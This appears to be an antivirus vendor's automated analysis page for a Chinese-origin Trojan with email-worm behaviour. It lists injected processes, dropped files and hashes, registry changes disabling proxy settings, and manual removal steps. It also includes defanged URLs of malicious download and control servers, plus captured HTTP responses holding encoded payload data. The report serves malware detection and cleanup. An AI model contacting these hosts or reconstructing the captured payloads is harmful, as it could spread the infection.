Gen.Variant.Strictor.115846_da6afddc70 – Adaware

Dynamic Analysis

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

TcService.exe:2764

The Trojan injects its code into the following process(es):

sesvcs_963_56089.exe:1956
%original file name%.exe:3308

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process TcService.exe:2764 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)

The process sesvcs_963_56089.exe:1956 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)

The process %original file name%.exe:3308 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)

Registry activity

The process TcService.exe:2764 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process sesvcs_963_56089.exe:1956 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\QuestionASK\APP]
"AppPathName" = "%Program Files%\sesvcs_963_56089.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:3308 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5	File path
15a43a47885c3eff331e97137c08343d	c:\CF_Helper.dll
5c7c865bafa4600bf1aca0e60ed8fa5a	c:\Program Files\NamuADLook.dll
d342bd6e4b881b21be18a02e2034b01a	c:\Program Files\sesvcs_963_56089.exe
d342bd6e4b881b21be18a02e2034b01a	c:\Program Files\unstall000.exe
ee904db75d49139181f892ac73859135	c:\TcService.exe
d342bd6e4b881b21be18a02e2034b01a	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt
5c7c865bafa4600bf1aca0e60ed8fa5a	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll
c472335b008c5942ec8a162177058111	c:\exdui.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
TcService.exe:2764
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)
C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)
C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.0.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: CF????
Comments: www.cfzhushou.com
Language: Chinese (Simplified, PRC)

Company Name: www.cfzhushou.comProduct Name: www.cfzhushou.comProduct Version: 2.6.0.0Legal Copyright: Copyright (C) 2017 CF????Legal Trademarks: Original Filename: Internal Name: File Version: 2.6.0.0File Description: CF????Comments: www.cfzhushou.comLanguage: Chinese (Simplified, PRC)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	3481600	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	3485696	1622016	1620992	5.54508	019f64b4e813b642777b432d389d114a
.rsrc	5107712	32768	29696	3.76085	57a8228ec969b9e72611e2e156647e31

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/	115.238.126.133
hxxp://blog.163.com/blog/static/26993501420171281319931/	115.238.126.133
hxxp://cdct.zhdns.net/aload/as/33.txt
hxxp://xzdownad.zglhsw.com/adpub//01.txt	104.31.197.48
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll	104.31.197.48
hxxp://publodf.kintip.com.cn/get_apis/paths/UPath0.txt	162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/urlv8_1.txt	162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/kword/UContext1.txt	162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/DH/DHKW.txt	162.159.211.96
hxxp://publodf.kintip.com.cn/	162.159.211.96
hxxp://down.9udn.com/aload/as/33.txt	122.228.207.207
hxxp://baike2016.blog.163.com/blog/static/26993501420171281319931/	115.238.126.133

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /aload/as/33.txt HTTP/1.1

User-Agent: MyAppByMulinB

Host: down.9udn.com

Cache-Control: no-cache

HTTP/1.0 200 OK

Content-Length: 40

Content-Type: text/plain

Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT

Accept-Ranges: bytes

ETag: "1ee814e288d21:1466"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sun, 19 Feb 2017 03:47:20 GMT

X-Cache: HIT from ctzjwzs2

Via: 1.0 ctzjwzs2 (squid)

Connection: keep-alive

hXXp://xzdownad.zglhsw.com/adpub//01.txtHTTP/1.0 200 OK..Content-Length: 40..Content-Type: text/plain..Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT..Accept-Ranges: bytes..ETag: "1ee814e288d21:1466"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sun, 19 Feb 2017 03:47:20 GMT..X-Cache: HIT from ctzjwzs2..Via: 1.0 ctzjwzs2 (squid)..Connection: keep-alive..hXXp://xzdownad.zglhsw.com/adpub//01.txt..

GET /leesin_2017/blog/static/2672760322016102115848934/ HTTP/1.1

Accept: */*

Referer: hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: blog.163.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 19 Feb 2017 03:41:08 GMT

Content-Type: text/html;charset=GBK

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Set-Cookie: NTESBLOGSI=414B2F0E31035AC3EA3D8B3BF0A191E4.yqblog15-8010; Domain=.blog.163.com; Path=/

Set-Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==; expires=Mon, 19-Feb-18 03:41:08 GMT; domain=.163.com; path=/

P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"

5a1.. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.. <html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">.. <head>.. <meta http-equiv="X-UA-Compatible" content="IE=7" />.. <meta http-equiv="content-type" content="text/html;charset=gbk"/>.. <meta http-equiv="content-style-type" content="text/css"/>.. <meta http-equiv="content-script-type" content="text/javascript"/>.. <meta name="version" content="neblog-1.0"/>.. <script type="text/javascript">.. .. .. document.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=location.hash); .. document.domain = location.hostname.replace(/^.*\.([\w] \.[\w] )$/,'$1');.. window.focus();.. window.getMusicTimeStamp=function(){return 'db4721d88d4cf492bc8388e52f709b99';};.. .. //BLOG-647:....OS.............................. (function(){.. window.setTimeout(function(){.. var _loginUserIcon = document.getElementById('loginUserIcon');.. var _rsavatarimg = document.getElementById('rsavatarimg');.. if(!!_loginUserIcon){.. var _loaded1 = false;.. var _img1 = new Image();.. _img1.onload = function(){.. _loaded1 = true;.. _img1.onload = null;.. };.. _img1.src = _loginUserIcon.src;.. window.setTimeout(function(){.. ..5a8.. if(!_loaded1){..

<<< skipped >>>

GET /get_apis/paths/UPath0.txt HTTP/1.1

Host: publodf.kintip.com.cn

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:41 GMT

Content-Type: text/plain

Content-Length: 708

Connection: keep-alive

Set-Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701; expires=Mon, 19-Feb-18 03:41:41 GMT; path=/; domain=.kintip.com.cn; HttpOnly

Last-Modified: Fri, 17 Feb 2017 13:16:47 GMT

Accept-Ranges: bytes

ETag: "e491d6172089d21:812"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b45da0ec5990-VIE

0g77iaswetswCyLvkQXe1iXbBHaw5CZslWdCJXZ2JXZT9SawF0XyVmdyV2Uv02bj5SM1kmahxmLzV2ZuFWbv8iOwRHdo1DSUFEUfNUQFZVSM9lRFRkCNcr1YXb/Kjas3v741CyLvkQXe1iXbBHaw5yajlGbDJXZ2JXZT9SawF0XyVmdyV2Uv02bj5SM1kmahxmLzV2ZuFWbv8iOwRHdo1DSUFEUfRVVO90QDF0XGVERK0QQVByLvkQCJkQXe1iXbRHe05SM0hXZ052bDV1LkJ3b3t2LzlGch9Fdld2L9gEVBB1XU5URHF0UV9lRFRkCNY918zL252ru8WLIv8SCJkQCd5VLetFd4RnLXtESE9CSE9yc0NXas9ycoRXYw9ycpBXYfRXZn9SPIR0XEJ1TXt0XGVERK0w9Xnts9qLv1CyLvkQCJkQXe1iXbRHe05CVQ9ESE9CSE9yc0NXas9ycoRXYw9ycpBXYfRXZn9SPUB1TfhERfZUREpQD267tC7PvE78wWTexg8yLgACIgACIgASCJ0lXt41WdRHe05SMfhjdsJXdvMHdzlGbvMHa0FGcvMXawF2X0V2ZvsVPIRVQQ91RJZkTPN0XGVERK0gvxaOsFfrq/CyLvACIgACIgACIJkQCJACIgACIgACIg0lXt41WdlDOwYTNb11N1AzM0sVX5kjN2EzW940TJNlUFZ1XGVERK....

GET /get_apis/paths/lists/urlv8_1.txt HTTP/1.1

Host: publodf.kintip.com.cn

Cache-Control: no-cache

Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:42 GMT

Content-Type: text/plain

Content-Length: 52692

Connection: keep-alive

Last-Modified: Sat, 18 Feb 2017 07:54:41 GMT

Accept-Ranges: bytes

ETag: "80768442bc89d21:812"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b461a15c5990-VIE

=QLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLtoQDt0SLE5URt0SLK0QXe1iXbBDMy0jQPJFUflVRO9UTP50XLNUSMN0XzAjCN0lXt41WdFmcvN3WdlmauF2Zb1Vdvd2bztVX1RWahJ2WdBHaw5ybyB3Yv02bj5SdklWYi5yd3d3WdBHaw5SdklWYi9SbvNmL1RWahJmL3d3db1VbvNmL1RWahJmLrx2Y6J2W9skUB10XT91SDlETD9lMwoQDd5VLetVXuM2Wd5CbthXdklWYitVXu4Wdb1lL6tVXuA3Wd5SZb1lLlFWbttVXuMHdhR3cb1lL3tVXuMHZhtVX1RWahJ2W9skUB10XG91SDlETD9lMwoQDd5VLetFM9I0TSB1XG1kTfN1XLNUSMN0XyAjCN0lXt41WwADO9I0TSB1XT91SDlETD9lMwoQDd5VLetFMwgTPC9kUQ9lRft0QJx0QfJDMK0QXe1iXbBDMz0jQPJFUfJVQCxETPJ1QT91UfJDMK0QXe1iXbRTPFx0QZN0XLNUSMN0XyAjCN0lXt41Wy0TRMNUWD91VPh0UfFDMK0QXe1iXb11Lt92YuEzbhJWZoNmL3d3dv8iOwRHdotVPLJVQN9FUNVlSfFDMK0QXe1iXbBDO9gVQN91VPh0UfFDMK0QXe1iXbBTM94USN91VPh0UfFDMK0QXe1iXbBTPYFUTfdUQQ9FUNVlSfFDMK0QXe1iXbBTPOlUTfdUQQ9FUNVlSfFDMK0QXe1iXbBDMx0zVPh0UfFDMK0QXe1iXbFDZh1DZhZSM98mJx0Ta/AHaw5CU4gzYyMXYyV2d5R3Lt92YuEzbhJWZoNmL3d3dv8iOwRHdo1DTSV1XwAjCN0lXt41Wx0zQQ10XZJFVTl0XwAjCN0lXt41Wx0jVMd0XFNVVTl0XwAjCN0lXt41Ww0DRM90XFNVVTl0XwAjCN0lXt41WwAjM9UkVP10XOlUTY9FMwoQDd5VLetFM50DUPJFUfVkVP1ETPRlUfBDMK0QXe1iXbBzN9I0TSB1XOlUTUJ0XwAjCN0lXt41W1ITPC9kUQ9lTJRlRFx0XwAjCN0lXt41Ww0TRQlFVft0QJx0QWB1XwAjCN0lXt41WwADM00TRH5UQS9FVJF0VfRUQPJ1XwAjCN0lXt41Ww0TRH5UQS91QN10XwAjCN0lXt41Ww0jTJ10XD1UTfBDMK0QXe1iXbJTPFdkTBJ1XEF0TS9FMwoQDd5VLetlM94USN9FRB9kUfBDMK0QXe1iXbBDMyETPDZkQfV0ROFkUfRVSBd1XwAjCN0lXt41WwAjM9MkRC9lTJ10XUlUQX9FMwoQDd5VLetFM30TRH5UQS9FVJF0VfBDMK0QXe1iXbBjN94USN9FVJF0VfBDMK0QXe1iXbFDZh1TRNFkTTNVQMN0XwAjCN0lXt41Wx0TRD5UQJxETB9VWCRVSNlETfBDMK0QXe1iXbJTPEl0XFBVWUN0XwAjCN0lXt41W00DRJ9VRD5UQJxETB9FMwoQDd5VLe

<<< skipped >>>

GET /get_apis/kword/UContext1.txt HTTP/1.1

Host: publodf.kintip.com.cn

Cache-Control: no-cache

Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:43 GMT

Content-Type: text/plain

Content-Length: 12412

Connection: keep-alive

Last-Modified: Mon, 01 Dec 2014 19:36:36 GMT

Accept-Ranges: bytes

ETag: "b07def1e9edd01:812"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b469625b5990-VIE

BDM04iM2UDNy4yNuczLyV2c39mcCFVUgYzMuczM18SayFmZhNFI4QjLwUjNx4CMuEzMvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSKx4iNgQlTgM3dvRmbpdFKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdlCMwQjLyYTN0IjL34yNvIXZzd3byJUURByOw4iNvQnblRWayRFI7EjL2ACVOByc39GZul2VgsDMuATMgUUST1EI7UGbilGdhBXbvNGKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdZzMuczM18SayFmZhNFI3ETMuATN3EjLw4yMz8SZt9mcoNEIp82ajV2RgU2apxGIswUTUh0SoAiNz4yNzUzL0l2SiV2VlxGcwFEIpEjL2ACVOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0lNgQGby92VlhGVgYzMuczM18SayFmZhNFIzYjLwUjNx4CMuEzMvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSK0YzVPdFI7EjL2ACVOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0VMz4yNzUzLpJXYmF2UgQjNuATM0EjLw4iNy8SZt9mcoNEIp82ajV2RgU2apxGIswUTUh0SoASMz4yNzUzL0l2SiV2VlxGcwFEIpEjL1ACVOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0lNz4yNzUzLpJXYmF2UgUjMx4SN4kTMuAjL2MzLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2MjL3MTNvQXaLJWZXVGbwBXQgkSMuUDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QXwIjL54CMuIzLvZ3bOx2bvNEI2MjL3MTNvkmchZWYTBCMxEjLzUDNx4CMucjMvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSKx4SNgQlTgM3dvRmbpdFKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdZzMuczM18SayFmZhNFIw4SOzcjLw4SMvIXZzd3byJUVgcDMx4CMwcTMuAjLyMzLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2MjL3MTNvQXaLJWZXVGbwBXQgkSMuYDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QX2MjL3MTNvkmchZWYTBSMwEjL5kTNx4CMuAzMvUWbvJHaDBCMwATMuIjLz4CNv42boRHeh1EIp82ajV2RgU2apxGIswUTUh0SoAiNz4yNzUzL0l2SiV2VlxGcwFEIpQjNX90VgsTMuYDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QX2

<<< skipped >>>

GET /get_apis/paths/lists/DH/DHKW.txt HTTP/1.1

Host: publodf.kintip.com.cn

Cache-Control: no-cache

Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:46 GMT

Content-Type: text/plain

Content-Length: 103236

Connection: keep-alive

Last-Modified: Mon, 01 Dec 2014 19:37:06 GMT

Accept-Ranges: bytes

ETag: "2d4a3309edd01:812"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b476c3f45990-VIE

oL19Kd3Ivf1HHboCzi P3qvQPb4Wr9v43LL6SdvSTct1rs1KTqx8DLLka82Rv6y9qc1Izi Jfa00Hs3WTMssUu19P70XvOwIXLLdjMwD7M07X9x9Kq8C/ML4GL6JT7zlfMw1ydunfLqNzSp yPskaM/wCdv0OssKzC2QH tOr75IvMyuWs6LDDNs0OwtS93w6O7Tft45yi61S7zJjrwwyswsA8tkSd2PDdwweML6vb6Lbsx9qspyb60pmLLner8HD71s/bvKzqx9jML6SdvSffwLjsrFndyso/uPHczLzCq327tKfb98Wr0oeNL u8q5Gusiet 5C8waTd RXP1K0ALwL8qILLsHHboCTeyieNLQPb4WXDMwIzMsoL19Kdoya6sYjLLka82Rv6yEX73PHvws46uGz7pRTfw6nLwDzS9KzLvlbd/zSLti6ML6SdvS3NyAPszQvf1G/rv4yCuxiey0 c5H7duNPNLmSrp6SctkOb/5Sqx8DLLKfb98iN0hfrz6eOys8Nsuz 0XH9xs0Ow6T7yDPNv0 cy4yizWj616ns9Un9zQHMsHzi/8Sex6vb6Lbsx9q897S7tsc6tyf8r2eet9qMq2ycusMsu3H8yIb/16SdvSLNvETML6v7zB38yySb5zyNxbPLLoebv3q8t1zLx1Osus47yrmb4yK61LjcvLrQDs0NyAP8xxGqw6n7q6yC0zGu10AjM2wiuU3r0in77KzCpGvd0ruM512qv9q8q6yy8Hrq0nGN9BPPtDT808yirHndygbrqSXu19P7vya wsoL19KN2QHqwOD9 VzStQr/uTXLtP3du2HLLDPd03WvyWrs74C9xkaM/wyyw6qL19KN2QH tSzLxEzytGrvsfDr7sXr0oeNL4GL6JT7zJjr03qay8SNLObNw3qfy2Td2PDdwweML6vb6Lbsx9qctjzyp3K/xoaLz5aNuNbLL1r89BvMy0SroOzdui6ML6v7zBXtyNv8r2S91sUvysad6zq8t1zLL u8q5Gusied RXP15vcoXD907OsCNwSzQvf1HHboCrfurqLLQPb4WHDMyYDL6SdvS3M07XNL0ir3QTqxbH9qL3ryrqLLnGN9BrfyG/rvxyS9KXu19PL58euzsccshKszQvf1djMwDzCuxiey0 c5HPas3uLLkaM/w6s15Hd9UzytGrvsEXL2QH tsAvwvWLt3G ufDr7sLeuKLLL4GL6JXL06vLtPnMusEqsyyb2PDdwweMw3SK1Or75Izi 7m yGbcvK3fwzrMLcnc69e6tyf8r2eetsg6t9e79BvMy02s3Ozi 72f1D37zB38ys0M0cvsy3WPvsaN/OzivLvauKft4NHusie9q2atxK0ALHHboCj6tknsoXzC0zGu1rXt95u2cuxyw6 cvIHruU3r0G/L0ELNvETMLdj8 